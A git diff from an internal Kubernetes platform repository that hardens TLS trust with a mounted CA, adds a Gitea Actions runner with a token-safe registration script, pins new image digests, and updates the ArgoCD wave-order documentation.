+                      headSha:
+                        type: string
+                        description: "Gitea main branch commit SHA (40 lowercase hex) the promoted digest was built from"
+                      digest:
+                        type: string
+                        description: "Harbor content digest (sha256:<64 lowercase hex>) of the promoted artifact"
+                      image:
+                        type: string
+                        description: "Fully resolved, immutable image reference (<harborRegistry>/<appName>/<service name>@<digest>) the Deployment uses"

--- a/docs/guides/local-development.md
+++ b/docs/guides/local-development.md
@@ -167,16 +167,19 @@ nu scripts/local-setup.nu reset
 ┌─────────────────────────────────────────────────────────────────────────┐
 │                    ArgoCD (Phase 2)                                     │
 │                                                                         │
-│  Root App creates all 27 child Application CRs:                        │
+│  Root App creates all 30 child Application CRs:                        │
 │      Wave -1: namespaces                                                │
 │      Wave  0: cert-manager, external-secrets, nats, opensearch,         │
 │               postgresql                                               │
-│      Wave  1: argocd, keycloak                                         │
+│      Wave  1: argocd, keycloak, nats-jetstream-controller               │
 │      Wave  2: backstage, gitea, grafana, harbor, jaeger, landingpage,   │
 │               opencost, sonarqube                                      │
 │      Wave  3: crossplane, kyverno                                      │
-│      Waves 4-8: providers, logging, policies, monitoring, catalog       │
+│      Waves 4-7: providers, logging, policies, monitoring, provider-    │
+│               configs, xrds, crossplane-harbor-bootstrap                │
+│      Wave  8: core-catalog                                              │
 │      Waves 9-10: cnpg, cnpg-cluster (manual; `future-infra` only)       │
+│      Wave 11: app-config (AppClaim GitOps sink)                        │
 │                                                                         │
 └───────────────────────────────────┬─────────────────────────────────────┘
                                     │
@@ -200,7 +203,7 @@ nu scripts/local-setup.nu reset
 | 1 | keycloak, argocd | keycloak: postgresql, cert-manager; argocd: Ingress (self-managed after Helm install) |
 | 2 | landingpage, backstage, gitea, grafana, harbor, jaeger, opencost, sonarqube | keycloak (OIDC/SAML); SQL consumers: postgresql; jaeger: opensearch |
 | 3 | crossplane, kyverno | All platform services healthy |
-| 4 | crossplane-providers, fluentd, kyverno-policies | Provider, log shipping, and policy extensions |
+| 4 | crossplane-providers, fluentd, kyverno-policies, gitea-actions-runner | Provider, log shipping, policy extensions, and the Gitea Actions CI runner |
 | 5 | monitoring-extras | Monitoring CRDs ready |
 | 6 | crossplane-provider-configs | Crossplane providers ready |
 | 7 | crossplane-xrds | Provider configurations ready |

--- a/docs/guides/platform-versions.md
+++ b/docs/guides/platform-versions.md
@@ -83,7 +83,7 @@ Third-party images record a human-readable tag **plus** an immutable digest:
 | `docker.gitea.com/gitea` | 1.26.1 | Gitea chart primary/init image |
 | `sonarqube` | 26.5.0.122743-community | SonarQube Community Build |
 | `ghcr.io/kyverno/readiness-checker` | v1.18.1 | Kyverno chart test/cleanup hooks |
-| `ghcr.io/digiorg/core-portal` | b77e94a | Backstage — core-portal `main` HEAD (Issue #279; was initial-scaffold commit `48d262e`) |
+| `ghcr.io/digiorg/core-portal` | e87210b | Backstage — reviewed core-portal PR #9 commit for Issue #285 (was `b77e94a`) |
 | `ghcr.io/digiorg/core-landingpage` | 32a6777 | Landing page (release tag + digest, was `main`) |
 
 ### Tier-1 DigiOrg-built images (allow-listed, kind-loaded)
@@ -164,18 +164,18 @@ where noted (this environment has no cluster — see section 7).
   patch-and-transform — any P&T Composition there must be converted to the
   function pipeline (`crossplane beta convert pipeline-composition`). Out of
   scope for this repo; validate `core-catalog` separately before promoting.
-- **core-catalog pin (Issue #281 Phase 4):** `apps/platform/core-catalog.yaml`
-  pins the **canonical reviewed merge commit** of core-catalog PR #17,
-  `13b7a3b4a0b7a5f5e692dc6d5a3fa416852c4273`. This supersedes the earlier
-  implementation SHA `4c30d9c3…`, which the merge commit is one commit ahead of
-  with **no changed files** (identical deployed content) — the change is
-  traceability only. The Application stays manually gated
+- **core-catalog pin (Issue #285):** `apps/platform/core-catalog.yaml` pins the
+  exact independently reviewed head of core-catalog PR #18,
+  `7fd51323db2c38e7ca36f5496e22686a93aa9fc4`. This deploys the deterministic
+  KCL pipeline together with the Core integration. If PR #18 is squash/rebase
+  merged, advance this pin to the resulting canonical commit before merging the
+  Core PR. The Application stays manually gated
   (`platform.digiorg.io/upgrade-gate: issue-275-manual`, no `syncPolicy.automated`);
   do not enable automatic catalog sync. `test_crossplane_migration.py`
-  (`CoreCatalogCanonicalPinTest`) locks the canonical pin, the immutable 40-hex
-  format, the manual gate, and that the superseded SHA is referenced nowhere.
-  When the reviewed revision advances, update the manifest, this line, and that
-  test's `CANONICAL_CATALOG_REVISION` together.
+  (`CoreCatalogReviewedRevisionPinTest`) locks the reviewed revision, the
+  immutable 40-hex format, the manual gate, and that superseded SHAs are
+  referenced nowhere. When the reviewed revision advances, update the manifest,
+  this line, and that test's `REVIEWED_CATALOG_REVISION` together.
 - **Rollback:** revert the chart pin (2.3.3 → 1.19.0) and provider pins; v2→v1
   downgrade of a cluster with namespaced XRs is unsupported, but this repo keeps
   LegacyCluster semantics so no XR conversion occurs.

--- a/platform/README.md
+++ b/platform/README.md
@@ -108,7 +108,7 @@ See `platform/base/ingress/README.md` for routing details and ExternalName servi
 
 ## Wave Deployment Order
 
-The 27 child Applications carry the ordering metadata below; ingress is applied during cluster bootstrap by `local-setup.nu`. Sync waves are not a cross-Application readiness guarantee: the script directly applies and probes PostgreSQL and OpenSearch before it creates the root App.
+The 30 child Applications carry the ordering metadata below; ingress is applied during cluster bootstrap by `local-setup.nu`. Sync waves are not a cross-Application readiness guarantee: the script directly applies and probes PostgreSQL and OpenSearch before it creates the root App.
 
 | Wave | Component | Namespace |
 |------|-----------|-----------|
@@ -120,6 +120,7 @@ The 27 child Applications carry the ordering metadata below; ingress is applied 
 | 0 | postgresql | platform-db |
 | 1 | argocd | argocd |
 | 1 | keycloak | keycloak |
+| 1 | nats-jetstream-controller | messaging |
 | 2 | backstage | backstage |
 | 2 | gitea | gitea |
 | 2 | grafana | monitoring |
@@ -133,12 +134,15 @@ The 27 child Applications carry the ordering metadata below; ingress is applied 
 | 4 | crossplane-providers | crossplane-system |
 | 4 | fluentd | logging |
 | 4 | kyverno-policies | kyverno |
+| 4 | gitea-actions-runner | gitea |
 | 5 | monitoring-extras | monitoring |
 | 6 | crossplane-provider-configs | crossplane-system |
 | 7 | crossplane-xrds | crossplane-system |
+| 7 | crossplane-harbor-bootstrap | crossplane-system |
 | 8 | core-catalog | crossplane-system |
 | 9 | cnpg (**manual**) | cnpg-system |
 | 10 | cnpg-cluster (**manual**) | platform-db |
+| 11 | app-config | app-claims |
 
 Wave 0 contains the foundation and permanent core data layer. Normal `up` does not sync the manual CNPG Applications in waves 9–10. Use `nu scripts/local-setup.nu future-infra` to promote the optional future hosted-application database operator and Cluster in a fail-closed sequence.
 

--- a/platform/base/backstage/deployment.yaml
+++ b/platform/base/backstage/deployment.yaml
@@ -66,10 +66,14 @@ spec:
             # Keycloak OIDC configuration
             - name: AUTH_OIDC_METADATA_URL
               value: "https://digiorg.local/keycloak/realms/digiorg-core-platform/.well-known/openid-configuration"
-            # Skip TLS verification for self-signed cert in local dev
-            # Remove NODE_TLS_REJECT_UNAUTHORIZED in production (use proper CA trust instead)
-            - name: NODE_TLS_REJECT_UNAUTHORIZED
-              value: "0"
+            # Issue #285 (TLS hardening): trust the digiorg.local CA via a
+            # mounted copy of the public certificate (see the
+            # digiorg-local-ca volume below), never
+            # NODE_TLS_REJECT_UNAUTHORIZED=0 -- that disables certificate
+            # verification for every outbound HTTPS call this process makes
+            # (Keycloak OIDC discovery, the Gitea integration), not just one.
+            - name: NODE_EXTRA_CA_CERTS
+              value: /etc/digiorg/ca/ca.crt
             - name: AUTH_OIDC_CLIENT_ID
               value: backstage
             - name: AUTH_OIDC_CLIENT_SECRET
@@ -85,6 +89,19 @@ spec:
                   name: backstage-secrets
                   key: GITHUB_TOKEN
                   optional: true
+            # Gitea integration (Issue #285): required for the AppClaim
+            # GitOps create-pull-request publish action. Dedicated
+            # least-privilege identity (write access to DigiOrg/app-config
+            # only), provisioned by scripts/local-setup.nu
+            # configure_backstage_gitea_publisher -- never the platform
+            # bootstrap/admin token. Fail-closed (not optional): publishing
+            # must never silently no-op with an empty credential.
+            - name: GITEA_TOKEN
+              valueFrom:
+                secretKeyRef:
+                  name: backstage-gitea-credentials
+                  key: GITEA_TOKEN
+                  optional: false
             # Kubernetes Ingestor — in-cluster configuration
             # KUBERNETES_API_URL: internal cluster API server (Backstage runs in-cluster)
             - name: KUBERNETES_API_URL
@@ -96,6 +113,13 @@ spec:
                   name: backstage-k8s-token
                   key: token
                   optional: true
+          volumeMounts:
+            # Public certificate only (never cert-manager's private key) --
+            # kept in sync by scripts/local-setup.nu
+            # copy_digiorg_local_ca_to_namespace.
+            - name: digiorg-local-ca
+              mountPath: /etc/digiorg/ca
+              readOnly: true
           resources:
             requests:
               memory: "512Mi"
@@ -117,3 +141,7 @@ spec:
             initialDelaySeconds: 120
             periodSeconds: 30
             failureThreshold: 5
+      volumes:
+        - name: digiorg-local-ca
+          secret:
+            secretName: digiorg-local-ca

--- a/platform/base/backstage/deployment.yaml
+++ b/platform/base/backstage/deployment.yaml
@@ -32,7 +32,7 @@ spec:
               echo "PostgreSQL is ready!"
       containers:
         - name: backstage
-          image: ghcr.io/digiorg/core-portal:b77e94a@sha256:44d00aba125e1e66d712222ec7f64cbc7cce02f05e5f05146af5af996bfe19dd
+          image: ghcr.io/digiorg/core-portal:e87210b@sha256:a255cf284f333741429ca84d17382d890a2536dc921a8d8ef189e14e2e6fb767
           imagePullPolicy: Always
           ports:
             - containerPort: 7007

--- a/platform/base/gitea-actions-runner/configmap.yaml
+++ b/platform/base/gitea-actions-runner/configmap.yaml
@@ -1,0 +1,95 @@
+# Issue #285 (TLS hardening): act_runner v0.6.1's entrypoint
+# (gitea.com/gitea/runner scripts/run.sh @ tag v0.6.1) only passes --config
+# to `act_runner register`/`daemon` when CONFIG_FILE is set -- there is no
+# other way to reach container.options, which is how the CA is mounted into
+# every ephemeral job container below (confirmed against the pinned
+# internal/pkg/config/config.example.yaml at the same tag).
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: gitea-actions-runner-config
+  namespace: gitea
+data:
+  config.yaml: |
+    log:
+      level: info
+    runner:
+      insecure: false
+    container:
+      privileged: true
+      # Bind-mounts the runner pod's own copy of the digiorg-local CA
+      # (mounted at /etc/digiorg/ca/ca.crt, see deployment.yaml) into every
+      # job container the embedded dockerd creates, at the path the
+      # generated CI workflow's GIT_SSL_CAINFO/NODE_EXTRA_CA_CERTS env vars
+      # point to (core-catalog compositions/local/pipeline.yaml
+      # jobContainerCaCertPath) -- so actions/checkout's git clone and any
+      # Node-based step both trust the same CA the runner itself does.
+      options: "--volume=/etc/digiorg/ca/ca.crt:/etc/digiorg/ca/ca.crt:ro"
+  # Issue #285 core review: the pinned image's own entrypoint
+  # (gitea.com/gitea/runner scripts/run.sh @ v0.6.1) reads
+  # GITEA_RUNNER_REGISTRATION_TOKEN_FILE into an env var and then passes it
+  # as `act_runner register --token <value>` -- a literal argv value,
+  # visible via `ps`/`/proc/<pid>/cmdline` to anything with exec access to
+  # the container for the life of that subprocess. This script is mounted
+  # over /usr/local/bin/run.sh (see deployment.yaml), which the image's
+  # s6-supervised act_runner service execs by name (scripts/s6/act_runner/run
+  # @ the same tag), and instead feeds the token to act_runner's
+  # *interactive* register path on stdin: omitting --no-interactive and
+  # --token drops into registerInteractive (internal/app/cmd/register.go @
+  # v0.6.1), which only prompts (reads stdin) for a stage whose value is
+  # still empty -- pre-filling --instance/--name/--labels as flags means the
+  # token is the only stdin prompt ever reached, and it never appears in the
+  # process's own argv or as an env var.
+  run.sh: |
+    #!/usr/bin/env bash
+
+    if [[ ! -d /data ]]; then
+      mkdir -p /data
+    fi
+    cd /data
+
+    RUNNER_STATE_FILE=".runner"
+
+    CONFIG_ARG=""
+    if [[ -n "${CONFIG_FILE:-}" ]]; then
+      CONFIG_ARG="--config ${CONFIG_FILE}"
+    fi
+    LABEL_ARG=""
+    if [[ -n "${GITEA_RUNNER_LABELS:-}" ]]; then
+      LABEL_ARG="--labels ${GITEA_RUNNER_LABELS}"
+    fi
+
+    # Registration state on the PVC makes re-registration resume-stable: a
+    # non-empty .runner file means this runner already registered in a
+    # previous run, so registration (and the token read below) is skipped
+    # entirely.
+    if [[ ! -s "$RUNNER_STATE_FILE" ]]; then
+      if [[ -z "${GITEA_RUNNER_REGISTRATION_TOKEN_FILE:-}" ]] || [[ ! -f "${GITEA_RUNNER_REGISTRATION_TOKEN_FILE}" ]]; then
+        echo "GITEA_RUNNER_REGISTRATION_TOKEN_FILE is not set or does not exist" >&2
+        exit 1
+      fi
+
+      try=0
+      success=0
+      while [[ $success -eq 0 ]] && [[ $try -lt ${GITEA_MAX_REG_ATTEMPTS:-10} ]]; do
+        try=$((try + 1))
+        printf '%s\n' "$(cat "${GITEA_RUNNER_REGISTRATION_TOKEN_FILE}")" | act_runner register \
+          --instance "${GITEA_INSTANCE_URL}" \
+          --name     "${GITEA_RUNNER_NAME:-$(hostname)}" \
+          ${CONFIG_ARG} ${LABEL_ARG} 2>&1 | tee /tmp/reg.log
+
+        if grep -q 'Runner registered successfully' /tmp/reg.log; then
+          success=1
+        else
+          echo "Waiting to retry ..."
+          sleep 5
+        fi
+      done
+
+      if [[ $success -eq 0 ]]; then
+        echo "Failed to register the Gitea Actions runner after ${GITEA_MAX_REG_ATTEMPTS:-10} attempts" >&2
+        exit 1
+      fi
+    fi
+
+    exec act_runner daemon ${CONFIG_ARG}

--- a/platform/base/gitea-actions-runner/deployment.yaml
+++ b/platform/base/gitea-actions-runner/deployment.yaml
@@ -1,0 +1,163 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: gitea-actions-runner
+  namespace: gitea
+spec:
+  replicas: 1
+  # A single runner identity backed by one ReadWriteOnce PVC (see pvc.yaml) --
+  # a rolling update would try to run two pods against that volume at once.
+  strategy:
+    type: Recreate
+  selector:
+    matchLabels:
+      app: gitea-actions-runner
+  template:
+    metadata:
+      labels:
+        app: gitea-actions-runner
+    spec:
+      containers:
+        - name: runner
+          # gitea/act_runner v0.6.1, dind-rootless variant: the official
+          # image bundles act_runner + a rootless dockerd (s6-supervised) in
+          # one container, so Gitea Actions CI jobs can build/push container
+          # images without a separate DinD sidecar. "Rootless" describes the
+          # dockerd process inside the container, NOT the Kubernetes
+          # securityContext: rootless dockerd still needs to create user/mount
+          # namespaces (newuidmap/newgidmap, unshare/clone with
+          # CLONE_NEWUSER), which this cluster's default seccomp/PSA posture
+          # only permits under `privileged: true` -- confirmed against the
+          # upstream gitea/runner official Kubernetes example
+          # (examples/kubernetes/rootless-docker.yaml @ gitea.com/gitea/runner
+          # main), whose runner container securityContext is exactly
+          # `privileged: true` and nothing else (Issue #285 blocker #4).
+          #
+          # TRUST BOUNDARY: this makes the `gitea` namespace a privileged
+          # trust boundary, distinct from every per-app namespace this
+          # platform creates for AppClaims (core-catalog's
+          # compositions/local/pipeline.yaml `namespaceObj`), none of which
+          # are privileged. Only this Deployment's pods in `gitea` may run
+          # privileged; a cluster-wide privileged/PSA-restricting Kyverno
+          # ClusterPolicy, if one is ever added, must except only this
+          # Deployment's pods in the `gitea` namespace, never a broader scope
+          # (see test_no_dangling_kyverno_policy_exception_is_introduced).
+          # Pinned by the exact multi-arch manifest-list digest (the
+          # `docker-content-digest` response header from
+          # registry-1.docker.io), verified 2026-07-22.
+          image: gitea/act_runner:0.6.1-dind-rootless@sha256:6b8f7c4297c0a5c4c181e4737665d4af69288cdc380e2887105a05a2b78930df
+          env:
+            # Issue #285 (TLS hardening): the trusted digiorg.local ingress
+            # over HTTPS, not the raw in-cluster Gitea Service address.
+            - name: GITEA_INSTANCE_URL
+              value: "https://digiorg.local/gitea"
+            # Go's crypto/x509 honors SSL_CERT_FILE on Linux (the base image
+            # is docker:28-dind-rootless, Alpine-based -- confirmed against
+            # the pinned Dockerfile at gitea.com/gitea/runner tag v0.6.1),
+            # so the runner's own calls to GITEA_INSTANCE_URL trust the
+            # digiorg-local CA without insecure/-k.
+            - name: SSL_CERT_FILE
+              value: /etc/digiorg/ca/ca.crt
+            # act_runner's entrypoint only passes --config when this is set
+            # (scripts/run.sh @ the same pinned tag) -- required to reach
+            # container.options below.
+            - name: CONFIG_FILE
+              value: /etc/act-runner-config/config.yaml
+            # Read by this Deployment's own run.sh (configmap.yaml, mounted
+            # over the image's stock entrypoint below) -- the Kubernetes-
+            # native equivalent of the "Docker Secret" pattern the official
+            # act_runner entrypoint documents. Deliberately NOT the direct
+            # GITEA_RUNNER_REGISTRATION_TOKEN env var: an env value is
+            # visible via `kubectl describe pod`/`/proc/<pid>/environ` for
+            # the container's whole lifetime. The pinned image's own
+            # scripts/run.sh reads this file into that env var and then
+            # passes it as `act_runner register --token <value>` -- a
+            # literal argv value, `ps`/`/proc/<pid>/cmdline`-visible for the
+            # life of that subprocess -- which is exactly why this
+            # Deployment overrides run.sh instead of using the stock one.
+            - name: GITEA_RUNNER_REGISTRATION_TOKEN_FILE
+              value: /run/secrets/gitea-actions-runner/token
+            - name: GITEA_RUNNER_NAME
+              value: "digiorg-local-runner"
+            # Maps the `ubuntu-latest` label the generated CI workflow uses
+            # (core-catalog compositions/local/pipeline.yaml) to a pinned
+            # job-runtime image, so a job never silently falls back to an
+            # unpinned/floating image.
+            - name: GITEA_RUNNER_LABELS
+              value: "ubuntu-latest:docker://catthehacker/ubuntu:act-latest@sha256:3220992391c1182a0cfe4c64453511772c54f4c39e960d26a5e327960675982e"
+          volumeMounts:
+            - name: registration-token
+              mountPath: /run/secrets/gitea-actions-runner
+              readOnly: true
+            - name: data
+              mountPath: /data
+            - name: act-runner-config
+              mountPath: /etc/act-runner-config
+              readOnly: true
+            # Issue #285 core review: shadow the image's own
+            # /usr/local/bin/run.sh (which the image's s6-supervised
+            # act_runner service execs by name) with the token-safe
+            # entrypoint in configmap.yaml's `run.sh` key, via subPath so
+            # only this one file is replaced.
+            - name: act-runner-config
+              mountPath: /usr/local/bin/run.sh
+              subPath: run.sh
+              readOnly: true
+            # Issue #285 (TLS hardening): the same digiorg-local-ca Secret
+            # volume, mounted twice -- once at a generic path for the
+            # runner's own SSL_CERT_FILE, and once at Docker's
+            # registry-specific trust convention
+            # (/etc/docker/certs.d/<host>/ca.crt) so the embedded rootless
+            # dockerd trusts the digiorg.local registry without
+            # insecureSkipVerify. Each key in the Secret is projected as a
+            # file named after the key, so mounting the directory yields
+            # .../ca.crt automatically.
+            - name: digiorg-local-ca
+              mountPath: /etc/digiorg/ca
+              readOnly: true
+            - name: digiorg-local-ca
+              mountPath: /etc/docker/certs.d/digiorg.local
+              readOnly: true
+          securityContext:
+            # `privileged: true` and nothing else -- capabilities.drop,
+            # seccompProfile and allowPrivilegeEscalation are meaningless-to-
+            # misleading alongside it (a privileged container is granted
+            # every capability and an unconfined seccomp profile by the
+            # container runtime regardless of what's declared here), and
+            # declaring them anyway falsely implies this container is still
+            # confined. Matches the upstream gitea/runner official example
+            # exactly (see comment above).
+            privileged: true
+          resources:
+            requests:
+              cpu: "200m"
+              memory: "512Mi"
+            limits:
+              cpu: "2000m"
+              memory: "2Gi"
+      volumes:
+        - name: registration-token
+          secret:
+            secretName: gitea-actions-runner-token
+            items:
+              - key: token
+                path: token
+        - name: data
+          persistentVolumeClaim:
+            claimName: gitea-actions-runner-data
+        - name: act-runner-config
+          configMap:
+            name: gitea-actions-runner-config
+            items:
+              - key: config.yaml
+                path: config.yaml
+              - key: run.sh
+                path: run.sh
+                # Executable so the s6-supervised act_runner service's
+                # `exec run.sh` (scripts/s6/act_runner/run @ v0.6.1, which
+                # resolves run.sh via PATH) can run it; ConfigMap volume
+                # entries default to 0644.
+                mode: 0755
+        - name: digiorg-local-ca
+          secret:
+            secretName: digiorg-local-ca

--- a/platform/base/gitea-actions-runner/deployment.yaml
+++ b/platform/base/gitea-actions-runner/deployment.yaml
@@ -19,19 +19,17 @@ spec:
     spec:
       containers:
         - name: runner
-          # gitea/act_runner v0.6.1, dind-rootless variant: the official
-          # image bundles act_runner + a rootless dockerd (s6-supervised) in
+          # gitea/act_runner v0.6.1, dind variant: the official image bundles
+          # act_runner + dockerd (s6-supervised) in
           # one container, so Gitea Actions CI jobs can build/push container
-          # images without a separate DinD sidecar. "Rootless" describes the
-          # dockerd process inside the container, NOT the Kubernetes
-          # securityContext: rootless dockerd still needs to create user/mount
-          # namespaces (newuidmap/newgidmap, unshare/clone with
-          # CLONE_NEWUSER), which this cluster's default seccomp/PSA posture
-          # only permits under `privileged: true` -- confirmed against the
-          # upstream gitea/runner official Kubernetes example
-          # (examples/kubernetes/rootless-docker.yaml @ gitea.com/gitea/runner
-          # main), whose runner container securityContext is exactly
-          # `privileged: true` and nothing else (Issue #285 blocker #4).
+          # images without a separate DinD sidecar or a host Docker socket.
+          # The embedded dockerd needs `privileged: true` to create nested
+          # container namespaces and mounts, matching the upstream
+          # gitea/runner Kubernetes DinD guidance (Issue #285 blocker #4).
+          # The rootless image variant was rejected by a clean Kind bootstrap:
+          # despite requiring this same Kubernetes privilege, RootlessKit also
+          # depends on host user-namespace policy and failed under Ubuntu's
+          # AppArmor restrictions before act_runner could register.
           #
           # TRUST BOUNDARY: this makes the `gitea` namespace a privileged
           # trust boundary, distinct from every per-app namespace this
@@ -44,15 +42,15 @@ spec:
           # (see test_no_dangling_kyverno_policy_exception_is_introduced).
           # Pinned by the exact multi-arch manifest-list digest (the
           # `docker-content-digest` response header from
-          # registry-1.docker.io), verified 2026-07-22.
-          image: gitea/act_runner:0.6.1-dind-rootless@sha256:6b8f7c4297c0a5c4c181e4737665d4af69288cdc380e2887105a05a2b78930df
+          # registry-1.docker.io), verified 2026-07-23.
+          image: gitea/act_runner:0.6.1-dind@sha256:578925b4bdec5f60d93b5ba766cf02f2f9f32b1c8a4ec665ddf4d53d45f683c7
           env:
             # Issue #285 (TLS hardening): the trusted digiorg.local ingress
             # over HTTPS, not the raw in-cluster Gitea Service address.
             - name: GITEA_INSTANCE_URL
               value: "https://digiorg.local/gitea"
             # Go's crypto/x509 honors SSL_CERT_FILE on Linux (the base image
-            # is docker:28-dind-rootless, Alpine-based -- confirmed against
+            # is docker:28-dind, Alpine-based -- confirmed against
             # the pinned Dockerfile at gitea.com/gitea/runner tag v0.6.1),
             # so the runner's own calls to GITEA_INSTANCE_URL trust the
             # digiorg-local CA without insecure/-k.
@@ -107,7 +105,7 @@ spec:
             # volume, mounted twice -- once at a generic path for the
             # runner's own SSL_CERT_FILE, and once at Docker's
             # registry-specific trust convention
-            # (/etc/docker/certs.d/<host>/ca.crt) so the embedded rootless
+            # (/etc/docker/certs.d/<host>/ca.crt) so the embedded
             # dockerd trusts the digiorg.local registry without
             # insecureSkipVerify. Each key in the Secret is projected as a
             # file named after the key, so mounting the directory yields

--- a/platform/base/gitea-actions-runner/kustomization.yaml
+++ b/platform/base/gitea-actions-runner/kustomization.yaml
@@ -1,0 +1,6 @@
+apiVersion: kustomize.config.k8s.io/v1beta1
+kind: Kustomization
+resources:
+  - deployment.yaml
+  - pvc.yaml
+  - configmap.yaml

--- a/platform/base/gitea-actions-runner/pvc.yaml
+++ b/platform/base/gitea-actions-runner/pvc.yaml
@@ -1,0 +1,13 @@
+apiVersion: v1
+kind: PersistentVolumeClaim
+metadata:
+  name: gitea-actions-runner-data
+  namespace: gitea
+spec:
+  accessModes:
+    - ReadWriteOnce
+  resources:
+    requests:
+      # act_runner's own registration state (.runner) plus the rootless
+      # dockerd image/layer cache for local CI builds.
+      storage: 10Gi

--- a/platform/base/harbor/harbor-oidc-config-job.yaml
+++ b/platform/base/harbor/harbor-oidc-config-job.yaml
@@ -44,17 +44,21 @@ spec:
             - -c
             - |
               set -e
-              HARBOR_API="http://harbor.harbor.svc.cluster.local/api/v2.0"
+              HARBOR_API="https://digiorg.local/api/v2.0"
+              CA_CERT="/etc/digiorg-ca/ca.crt"
+
+              echo "Waiting for the digiorg.local public CA..."
+              until [ -s "${CA_CERT}" ]; do sleep 2; done
 
               echo "Waiting for Harbor API to be ready..."
-              until curl -sf "${HARBOR_API}/ping" > /dev/null 2>&1; do
+              until curl --cacert "${CA_CERT}" -sf "${HARBOR_API}/ping" > /dev/null 2>&1; do
                 echo "  Harbor not ready yet, retrying in 5s..."
                 sleep 5
               done
               echo "Harbor API is ready."
 
               echo "Configuring OIDC authentication..."
-              HTTP_STATUS=$(curl -s -o /dev/null -w "%{http_code}" -X PUT \
+              HTTP_STATUS=$(curl --cacert "${CA_CERT}" -s -o /dev/null -w "%{http_code}" -X PUT \
                 -u "admin:${HARBOR_ADMIN_PASSWORD}" \
                 -H "Content-Type: application/json" \
                 -d "{
@@ -64,7 +68,7 @@ spec:
                   \"oidc_client_id\": \"harbor\",
                   \"oidc_client_secret\": \"${OIDC_CLIENT_SECRET}\",
                   \"oidc_scope\": \"openid,profile,email\",
-                  \"oidc_verify_cert\": false,
+                  \"oidc_verify_cert\": true,
                   \"oidc_auto_onboard\": true,
                   \"oidc_user_claim\": \"preferred_username\",
                   \"oidc_groups_claim\": \"groups\"
@@ -77,3 +81,12 @@ spec:
                 echo "ERROR: Harbor API returned HTTP ${HTTP_STATUS}. OIDC configuration failed."
                 exit 1
               fi
+          volumeMounts:
+            - name: digiorg-local-ca
+              mountPath: /etc/digiorg-ca
+              readOnly: true
+      volumes:
+        - name: digiorg-local-ca
+          secret:
+            secretName: digiorg-local-ca
+            optional: true

--- a/platform/base/harbor/harbor-proxy-cache-job.yaml
+++ b/platform/base/harbor/harbor-proxy-cache-job.yaml
@@ -54,10 +54,12 @@ spec:
             - -c
             - |
               set -eu
-              HARBOR_API="http://harbor.harbor.svc.cluster.local/api/v2.0"
+              HARBOR_API="https://digiorg.local/api/v2.0"
               AUTH="admin:${HARBOR_ADMIN_PASSWORD}"
 
-              CURL="curl --connect-timeout 5 --max-time 30 --retry 2"
+              echo "Waiting for the digiorg.local public CA..."
+              until [ -s /etc/digiorg-ca/ca.crt ]; do sleep 2; done
+              CURL="curl --cacert /etc/digiorg-ca/ca.crt --connect-timeout 5 --max-time 30 --retry 2"
 
               # Harbor error responses contain only API error code/message for
               # these non-secret payloads. Bound output to keep hook logs safe
@@ -206,3 +208,12 @@ spec:
               create_proxy_project k8s-proxy       "$(registry_id registry-k8s-io)"
 
               echo "Harbor proxy-cache configuration complete."
+          volumeMounts:
+            - name: digiorg-local-ca
+              mountPath: /etc/digiorg-ca
+              readOnly: true
+      volumes:
+        - name: digiorg-local-ca
+          secret:
+            secretName: digiorg-local-ca
+            optional: true

--- a/platform/base/namespaces/namespaces.yaml
+++ b/platform/base/namespaces/namespaces.yaml
@@ -12,6 +12,16 @@
 #   - harbor:           harbor (wave 2)
 #   - code-quality:     sonarqube (wave 2)
 #   - messaging:        nats (wave 0)
+#
+# app-claims (Issue #285): the fixed, pre-existing destination namespace for
+# AppClaim custom resources merged from the DigiOrg/app-config GitOps sink
+# repository (apps/platform/app-config.yaml, wave 9). AppClaims are namespaced
+# Crossplane v2 Claims and must live somewhere that already exists before the
+# app-config Application's first sync; the Namespace each AppClaim's
+# Composition creates for its own workloads (named after spec.appName) is a
+# wholly separate, composed resource created afterwards. app-claims hosts
+# only Claim objects, never application workloads, so it is deliberately NOT
+# in policies/kyverno/cluster-policies/block-appclaims-in-system-namespaces.yaml.
 ---
 apiVersion: v1
 kind: Namespace
@@ -202,3 +212,13 @@ metadata:
   labels:
     app.kubernetes.io/managed-by: argocd
     digiorg.io/platform-component: observability
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  annotations:
+    argocd.argoproj.io/sync-options: Prune=false
+  name: app-claims
+  labels:
+    app.kubernetes.io/managed-by: argocd
+    digiorg.io/platform-component: appclaim-delivery

--- a/platform/base/nats/values.yaml
+++ b/platform/base/nats/values.yaml
@@ -69,13 +69,13 @@ podTemplate:
 container:
   image:
     fullImageName: "nats:2.14.2-alpine@sha256:952d157e28d5394a211229bd57a7b37ff9f184e58e2c8486a08fa909fd254e32"
+  env:
+    NATS_JSC_NKEY_PUBLIC:
+      valueFrom:
+        secretKeyRef:
+          name: nats-jetstream-controller-nkey
+          key: public.nk
   merge:
-    env:
-      - name: NATS_JSC_NKEY_PUBLIC
-        valueFrom:
-          secretKeyRef:
-            name: nats-jetstream-controller-nkey
-            key: public.nk
     resources:
       requests:
         cpu: 50m

--- a/platform/base/nats/values.yaml
+++ b/platform/base/nats/values.yaml
@@ -40,6 +40,15 @@ config:
         jetstream: enabled
         users:
           - user: app
+          # Dedicated least-privilege identity for NACK. The private seed is
+          # mounted only into the controller; NATS receives the public NKey
+          # through a Secret-backed environment variable.
+          - nkey: << $NATS_JSC_NKEY_PUBLIC >>
+            permissions:
+              publish:
+                - $JS.API.>
+              subscribe:
+                - _INBOX.>
 
 # Disable nats-box utility container (not needed)
 natsBox:
@@ -61,6 +70,12 @@ container:
   image:
     fullImageName: "nats:2.14.2-alpine@sha256:952d157e28d5394a211229bd57a7b37ff9f184e58e2c8486a08fa909fd254e32"
   merge:
+    env:
+      - name: NATS_JSC_NKEY_PUBLIC
+        valueFrom:
+          secretKeyRef:
+            name: nats-jetstream-controller-nkey
+            key: public.nk
     resources:
       requests:
         cpu: 50m

--- a/platform/images/keycloak/Dockerfile
+++ b/platform/images/keycloak/Dockerfile
@@ -16,7 +16,7 @@
 
 ARG UPSTREAM_IMAGE=quay.io/keycloak/keycloak
 ARG UPSTREAM_TAG=26.7.0
-ARG UPSTREAM_DIGEST=sha256:2eb3cd316835c990e69e26ade292ffa78f6fb0db7d5fc6377463c162e1979ac0
+ARG UPSTREAM_DIGEST=sha256:0f198be292568439d700cdbfb893e69a6009bb43a94a06a945b1d3d506c76b13
 
 # --- Stage 1: build the optimized server ------------------------------------ #
